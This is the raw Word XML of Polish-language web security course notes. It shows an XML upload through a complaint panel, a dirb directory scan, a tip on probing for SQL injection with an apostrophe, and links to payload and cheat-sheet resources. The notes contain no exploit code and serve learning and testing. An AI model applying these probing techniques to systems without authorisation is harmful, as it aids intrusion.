        <w:t>Complain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> panel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439D222" w14:textId="176283BB" w:rsidR="005A0D85" w:rsidRDefault="005A0D85" w:rsidP="00F424D8">
      <w:r w:rsidRPr="005A0D85">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25D32B5A" wp14:editId="6609678D">
            <wp:extent cx="5760720" cy="23983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581" w14:textId="0CD43BC9" w:rsidR="00E42C52" w:rsidRDefault="00E42C52" w:rsidP="00F424D8">
      <w:r>
        <w:t xml:space="preserve">W kodzie strony znajduję </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xml’a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> jako </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allowed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006569F3">
        <w:t>mimeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="450642EB" w14:textId="23113FB1" w:rsidR="006569F3" w:rsidRDefault="006569F3" w:rsidP="00F424D8">
      <w:r w:rsidRPr="001B250E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5419DC64" wp14:editId="09628191">
            <wp:extent cx="5760720" cy="3539490"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="28" name="Obraz 28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zrzut ekranu, monitor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CA0" w14:textId="0AB8E8E7" w:rsidR="006569F3" w:rsidRDefault="006569F3" w:rsidP="00F424D8">
      <w:r>
        <w:t xml:space="preserve">Zamieszczam </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> jako plik, poniżej znajduje się odpowiedź, którą uzyskałem z aplikacji</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446E0CA2" w14:textId="630CABD4" w:rsidR="006569F3" w:rsidRDefault="006569F3" w:rsidP="00F424D8">
      <w:r w:rsidRPr="00E57406">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0B3E5B" wp14:editId="7EC83E58">
            <wp:extent cx="5760720" cy="166243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993" w14:textId="77777777" w:rsidR="006569F3" w:rsidRDefault="006569F3" w:rsidP="00F424D8"/>
    <w:p w14:paraId="28C1DDAB" w14:textId="4B0281A4" w:rsidR="006569F3" w:rsidRDefault="006569F3" w:rsidP="006569F3">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wynik ze skanowania </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – może się przyda potem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B13EF0" w14:textId="5D469F9A" w:rsidR="00A50187" w:rsidRDefault="00A50187" w:rsidP="00F424D8">
      <w:r w:rsidRPr="00A50187">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DFE367D" wp14:editId="35EF2AA4">
            <wp:extent cx="3719308" cy="2966181"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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2682" cy="29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98C" w14:textId="0EE84F35" w:rsidR="00D8556C" w:rsidRDefault="00D8556C" w:rsidP="00F424D8">
      <w:r>
        <w:t xml:space="preserve">1.Można sprawdzać, czy strona podatna na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql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poprzez wpisywanie ‘ w podejrzane pole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01335A5B" w14:textId="3EA456C8" w:rsidR="00E66AAC" w:rsidRDefault="00E66AAC" w:rsidP="00F424D8">
      <w:r w:rsidRPr="00E66AAC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4B4E2E" wp14:editId="4AAC1E94">
            <wp:extent cx="2070022" cy="1664135"/>
            <wp:effectExtent l="0" t="0" r="698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74325" cy="16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4836" w14:textId="7730EF45" w:rsidR="00C4792E" w:rsidRDefault="0045033A" w:rsidP="0045033A">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 15. Co dalej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0183B8" w14:textId="2C93269C" w:rsidR="00E57406" w:rsidRDefault="0045033A" w:rsidP="00F424D8">
      <w:r w:rsidRPr="0045033A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="243CFE8C" wp14:editId="52FE0C76">
            <wp:extent cx="2619741" cy="150516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7425" w14:textId="50274022" w:rsidR="001B250E" w:rsidRPr="00F424D8" w:rsidRDefault="001B250E" w:rsidP="00F424D8"/>
    <w:sectPr w:rsidR="001B250E" w:rsidRPr="00F424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1630F" w14:textId="77777777" w:rsidR="00630BFD" w:rsidRDefault="00630BFD" w:rsidP="000452C2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="348830AF" w14:textId="77777777" w:rsidR="00630BFD" w:rsidRDefault="00630BFD" w:rsidP="00045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0C9B4" w14:textId="77777777" w:rsidR="00630BFD" w:rsidRDefault="00630BFD" w:rsidP="000452C2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0EDB645C" w14:textId="77777777" w:rsidR="00630BFD" w:rsidRDefault="00630BFD" w:rsidP="00045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5F73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E6024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83821"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="689465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245A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE5EE6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709DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="804EC2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874029">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1883788442">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="24407856">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="506216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4DD"/>
    <w:rsid w:val="00004BA9"/>
    <w:rsid w:val="0001397A"/>
    <w:rsid w:val="00035BED"/>
    <w:rsid w:val="000452C2"/>
    <w:rsid w:val="000474DD"/>
    <w:rsid w:val="0005778C"/>
    <w:rsid w:val="000C0B0A"/>
    <w:rsid w:val="000C2E2D"/>
    <w:rsid w:val="000C43D5"/>
    <w:rsid w:val="000E618C"/>
    <w:rsid w:val="000F121B"/>
    <w:rsid w:val="000F17B0"/>
    <w:rsid w:val="001030A6"/>
    <w:rsid w:val="00107BAB"/>
    <w:rsid w:val="00110EC7"/>
    <w:rsid w:val="0015079A"/>
    <w:rsid w:val="0015615B"/>
    <w:rsid w:val="00160062"/>
    <w:rsid w:val="001602CB"/>
    <w:rsid w:val="001614D0"/>
    <w:rsid w:val="0016249E"/>
    <w:rsid w:val="001659F3"/>
    <w:rsid w:val="001736D6"/>
    <w:rsid w:val="0018404A"/>
    <w:rsid w:val="00191DD6"/>
    <w:rsid w:val="001A3762"/>
    <w:rsid w:val="001A5EC3"/>
    <w:rsid w:val="001B2160"/>
    <w:rsid w:val="001B250E"/>
    <w:rsid w:val="001B6E47"/>
    <w:rsid w:val="001C0214"/>
    <w:rsid w:val="002275D2"/>
    <w:rsid w:val="002477B1"/>
    <w:rsid w:val="00255C32"/>
    <w:rsid w:val="00256221"/>
    <w:rsid w:val="00261767"/>
    <w:rsid w:val="00267FE6"/>
    <w:rsid w:val="002871D3"/>
    <w:rsid w:val="00296D78"/>
    <w:rsid w:val="00297CDE"/>
    <w:rsid w:val="002C5A88"/>
    <w:rsid w:val="002C5B2A"/>
    <w:rsid w:val="002D0E4A"/>
    <w:rsid w:val="002D726D"/>
    <w:rsid w:val="00303F93"/>
    <w:rsid w:val="003070FE"/>
    <w:rsid w:val="00322D43"/>
    <w:rsid w:val="003306BF"/>
    <w:rsid w:val="00360B64"/>
    <w:rsid w:val="003712C3"/>
    <w:rsid w:val="00372CD7"/>
    <w:rsid w:val="003B177F"/>
    <w:rsid w:val="003B2449"/>
    <w:rsid w:val="003C4D53"/>
    <w:rsid w:val="003E24F8"/>
    <w:rsid w:val="003F0665"/>
    <w:rsid w:val="003F0C2B"/>
    <w:rsid w:val="003F69C0"/>
    <w:rsid w:val="003F7F4F"/>
    <w:rsid w:val="00414538"/>
    <w:rsid w:val="004276E5"/>
    <w:rsid w:val="00445DD8"/>
    <w:rsid w:val="0045033A"/>
    <w:rsid w:val="00457931"/>
    <w:rsid w:val="00461A52"/>
    <w:rsid w:val="0046501D"/>
    <w:rsid w:val="004A25A1"/>
    <w:rsid w:val="004E119D"/>
    <w:rsid w:val="004E12F9"/>
    <w:rsid w:val="004E7DC5"/>
    <w:rsid w:val="004F3E5F"/>
    <w:rsid w:val="0051277D"/>
    <w:rsid w:val="00514E8B"/>
    <w:rsid w:val="00517393"/>
    <w:rsid w:val="00530032"/>
    <w:rsid w:val="005358BE"/>
    <w:rsid w:val="00547EC1"/>
    <w:rsid w:val="0056032A"/>
    <w:rsid w:val="0056565A"/>
    <w:rsid w:val="00570DCD"/>
    <w:rsid w:val="00582AEA"/>
    <w:rsid w:val="00585A17"/>
    <w:rsid w:val="00586D35"/>
    <w:rsid w:val="00587E9F"/>
    <w:rsid w:val="00591474"/>
    <w:rsid w:val="005950F9"/>
    <w:rsid w:val="005A0D85"/>
    <w:rsid w:val="005A15E2"/>
    <w:rsid w:val="005A7F47"/>
    <w:rsid w:val="005B0FB5"/>
    <w:rsid w:val="005B2D9C"/>
    <w:rsid w:val="005C0F94"/>
    <w:rsid w:val="005E1CAA"/>
    <w:rsid w:val="005E3545"/>
    <w:rsid w:val="005F4AB4"/>
    <w:rsid w:val="005F7062"/>
    <w:rsid w:val="006079AE"/>
    <w:rsid w:val="00612F27"/>
    <w:rsid w:val="00621D08"/>
    <w:rsid w:val="00630BFD"/>
    <w:rsid w:val="00633CB9"/>
    <w:rsid w:val="00642546"/>
    <w:rsid w:val="00653AB1"/>
    <w:rsid w:val="00654E42"/>
    <w:rsid w:val="006569F3"/>
    <w:rsid w:val="00664A51"/>
    <w:rsid w:val="00667930"/>
    <w:rsid w:val="00680A18"/>
    <w:rsid w:val="00685D2D"/>
    <w:rsid w:val="00687181"/>
    <w:rsid w:val="00687AA4"/>
    <w:rsid w:val="006B1B20"/>
    <w:rsid w:val="006D0540"/>
    <w:rsid w:val="006E0E2B"/>
    <w:rsid w:val="006E5A34"/>
    <w:rsid w:val="006F0621"/>
    <w:rsid w:val="007049B1"/>
    <w:rsid w:val="00715B57"/>
    <w:rsid w:val="007163E3"/>
    <w:rsid w:val="007211D0"/>
    <w:rsid w:val="00727A6D"/>
    <w:rsid w:val="00730D91"/>
    <w:rsid w:val="007330BE"/>
    <w:rsid w:val="00736B5E"/>
    <w:rsid w:val="0074293B"/>
    <w:rsid w:val="007525CF"/>
    <w:rsid w:val="007669DD"/>
    <w:rsid w:val="00775FD2"/>
    <w:rsid w:val="007811CF"/>
    <w:rsid w:val="00787C28"/>
    <w:rsid w:val="007C6812"/>
    <w:rsid w:val="007D0506"/>
    <w:rsid w:val="007E3291"/>
    <w:rsid w:val="007F38CC"/>
    <w:rsid w:val="008058F2"/>
    <w:rsid w:val="00806ACF"/>
    <w:rsid w:val="00827563"/>
    <w:rsid w:val="0085206D"/>
    <w:rsid w:val="00857EDD"/>
    <w:rsid w:val="0086116E"/>
    <w:rsid w:val="00864885"/>
    <w:rsid w:val="00884013"/>
    <w:rsid w:val="00884D91"/>
    <w:rsid w:val="00887545"/>
    <w:rsid w:val="008A6A15"/>
    <w:rsid w:val="008C5D3E"/>
    <w:rsid w:val="008D6561"/>
    <w:rsid w:val="008F02F0"/>
    <w:rsid w:val="009135E5"/>
    <w:rsid w:val="00946190"/>
    <w:rsid w:val="00955610"/>
    <w:rsid w:val="00955920"/>
    <w:rsid w:val="00971606"/>
    <w:rsid w:val="00971AA1"/>
    <w:rsid w:val="009866E8"/>
    <w:rsid w:val="009B6E1A"/>
    <w:rsid w:val="009C68EE"/>
    <w:rsid w:val="009D4269"/>
    <w:rsid w:val="009D55E2"/>
    <w:rsid w:val="009D65C7"/>
    <w:rsid w:val="009D7D79"/>
    <w:rsid w:val="009E42C0"/>
    <w:rsid w:val="009F4235"/>
    <w:rsid w:val="00A03DE5"/>
    <w:rsid w:val="00A05140"/>
    <w:rsid w:val="00A12895"/>
    <w:rsid w:val="00A16961"/>
    <w:rsid w:val="00A17035"/>
    <w:rsid w:val="00A17517"/>
    <w:rsid w:val="00A2006D"/>
    <w:rsid w:val="00A30E50"/>
    <w:rsid w:val="00A32404"/>
    <w:rsid w:val="00A33A7C"/>
    <w:rsid w:val="00A41E06"/>
    <w:rsid w:val="00A47F78"/>
    <w:rsid w:val="00A50187"/>
    <w:rsid w:val="00A6790D"/>
    <w:rsid w:val="00A75E59"/>
    <w:rsid w:val="00A7703F"/>
    <w:rsid w:val="00A81596"/>
    <w:rsid w:val="00A83658"/>
    <w:rsid w:val="00A937EA"/>
    <w:rsid w:val="00A94EF8"/>
    <w:rsid w:val="00A96E36"/>
    <w:rsid w:val="00AA2831"/>
    <w:rsid w:val="00AA3897"/>
    <w:rsid w:val="00AB2D49"/>
    <w:rsid w:val="00AB65D6"/>
    <w:rsid w:val="00AC1ACA"/>
    <w:rsid w:val="00AC2971"/>
    <w:rsid w:val="00AE0516"/>
    <w:rsid w:val="00AE258F"/>
    <w:rsid w:val="00AE4992"/>
    <w:rsid w:val="00AF41D8"/>
    <w:rsid w:val="00AF5544"/>
    <w:rsid w:val="00B06772"/>
    <w:rsid w:val="00B11BEA"/>
    <w:rsid w:val="00B26F0B"/>
    <w:rsid w:val="00B30AEE"/>
    <w:rsid w:val="00B30E12"/>
    <w:rsid w:val="00B32830"/>
    <w:rsid w:val="00B43B1F"/>
    <w:rsid w:val="00B451F0"/>
    <w:rsid w:val="00B632B3"/>
    <w:rsid w:val="00B976DA"/>
    <w:rsid w:val="00BB2B6D"/>
    <w:rsid w:val="00BB52A3"/>
    <w:rsid w:val="00BB6799"/>
    <w:rsid w:val="00BD0F0A"/>
    <w:rsid w:val="00BE4C76"/>
    <w:rsid w:val="00BE7794"/>
    <w:rsid w:val="00BF5E15"/>
    <w:rsid w:val="00C016C4"/>
    <w:rsid w:val="00C27689"/>
    <w:rsid w:val="00C41B57"/>
    <w:rsid w:val="00C44BF4"/>
    <w:rsid w:val="00C4792E"/>
    <w:rsid w:val="00C6083A"/>
    <w:rsid w:val="00C6605D"/>
    <w:rsid w:val="00C76D4A"/>
    <w:rsid w:val="00C92EE1"/>
    <w:rsid w:val="00C94EAB"/>
    <w:rsid w:val="00C9606F"/>
    <w:rsid w:val="00CB5E3E"/>
    <w:rsid w:val="00D1211C"/>
    <w:rsid w:val="00D379C5"/>
    <w:rsid w:val="00D40B5E"/>
    <w:rsid w:val="00D43A57"/>
    <w:rsid w:val="00D523AD"/>
    <w:rsid w:val="00D603E0"/>
    <w:rsid w:val="00D63B93"/>
    <w:rsid w:val="00D75AE6"/>
    <w:rsid w:val="00D803C4"/>
    <w:rsid w:val="00D8556C"/>
    <w:rsid w:val="00D862F5"/>
    <w:rsid w:val="00D86506"/>
    <w:rsid w:val="00DA2425"/>
    <w:rsid w:val="00DA51DB"/>
    <w:rsid w:val="00DB093A"/>
    <w:rsid w:val="00DB097D"/>
    <w:rsid w:val="00DB6812"/>
    <w:rsid w:val="00DC004F"/>
    <w:rsid w:val="00DD6413"/>
    <w:rsid w:val="00DE5528"/>
    <w:rsid w:val="00DE7CC4"/>
    <w:rsid w:val="00DF5072"/>
    <w:rsid w:val="00DF7425"/>
    <w:rsid w:val="00E05263"/>
    <w:rsid w:val="00E1218F"/>
    <w:rsid w:val="00E207F4"/>
    <w:rsid w:val="00E21835"/>
    <w:rsid w:val="00E25D23"/>
    <w:rsid w:val="00E42C52"/>
    <w:rsid w:val="00E57406"/>
    <w:rsid w:val="00E66AAC"/>
    <w:rsid w:val="00E713FC"/>
    <w:rsid w:val="00E7300D"/>
    <w:rsid w:val="00EA4DBD"/>
    <w:rsid w:val="00EA4E54"/>
    <w:rsid w:val="00EB64E8"/>
    <w:rsid w:val="00ED0286"/>
    <w:rsid w:val="00EF0BD6"/>
    <w:rsid w:val="00F02D33"/>
    <w:rsid w:val="00F14222"/>
    <w:rsid w:val="00F14474"/>
    <w:rsid w:val="00F21023"/>
    <w:rsid w:val="00F23B81"/>
    <w:rsid w:val="00F34F46"/>
    <w:rsid w:val="00F41676"/>
    <w:rsid w:val="00F416E1"/>
    <w:rsid w:val="00F424D8"/>
    <w:rsid w:val="00F549F0"/>
    <w:rsid w:val="00F54DA5"/>
    <w:rsid w:val="00F57C2B"/>
    <w:rsid w:val="00F927F6"/>
    <w:rsid w:val="00F92DE2"/>
    <w:rsid w:val="00F92F36"/>
    <w:rsid w:val="00F93692"/>
    <w:rsid w:val="00F95E06"/>
    <w:rsid w:val="00FA0970"/>
    <w:rsid w:val="00FB0F96"/>
    <w:rsid w:val="00FB33BF"/>
    <w:rsid w:val="00FB450F"/>
    <w:rsid w:val="00FB56D6"/>
    <w:rsid w:val="00FB72EB"/>
    <w:rsid w:val="00FB77F6"/>
    <w:rsid w:val="00FD1C65"/>
    <w:rsid w:val="00FE1FF3"/>
    <w:rsid w:val="00FE6CAB"/>
    <w:rsid w:val="00FF30E6"/>
    <w:rsid w:val="00FF7C0A"/>
    <w:rsid w:val="00FF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F798F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B25FAE1D-5DC7-4AFB-924A-A47DE9EA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B5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B5E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B64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15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B5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B5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B11B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11BEA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452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452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452C2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586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B64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4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securityheaders.com/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://retirejs.github.io/retire.js/" TargetMode="External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github.com/swisskyrepo/PayloadsAllTheThing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Santandersecurityresearch/DrHeader" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csp-evaluator.withgoogle.com/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugcrowd.com/vulnerability-rating-taxonomy" TargetMode="External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ortswigger.net/web-security/cross-site-scripting/cheat-sheet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hyperlink" Target="https://docs.npmjs.com/cli/v9/commands/npm-audit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google/csp-evaluator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hyperlink" Target="https://infosec.mozilla.org/guidelines/web_security.html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rufflesecurity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github.com/aquasecurity/trivy" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss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</Pages>
  <Words>1139</Words>
  <Characters>6836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Miazga Bartosz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Miazga Bartosz</cp:lastModifiedBy>
  <cp:revision>248</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-20T07:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-21T20:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>